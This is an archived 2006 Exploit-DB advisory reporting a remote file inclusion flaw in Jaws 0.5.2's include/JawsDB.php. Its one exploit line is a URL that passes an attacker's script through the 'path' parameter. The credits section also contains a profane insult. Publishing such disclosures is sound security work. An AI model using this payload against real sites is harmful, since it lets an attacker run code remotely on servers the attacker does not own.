Jaws 0.5.2 - '/include/JawsDB.php' Remote File Inclusion

EDB-ID:

2627

CVE:

N/A

Author:

Drago84

Type:

webapps

Platform:

PHP

Published:

2006-10-23

###### ToXiC #########################
#
# Jaws 0.5.2: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                    jaws 0.5.2
#
#
#  Sorce Code:
#             http://forge.novell.com/modules/xfcontent/private.php/jaws/jaws-0.5.2/jaws-0.5.2.tar.gz
#
#
# Page:                
#     JawsDB.php
#
# Problem:
#
#         GLOBALS["path"] not Declare
#
# Dir :
#      /html/include/
#
#
#
#
#
#
# ExPloit :
#   http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[Evil Script]
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# milw0rm.com [2006-10-23]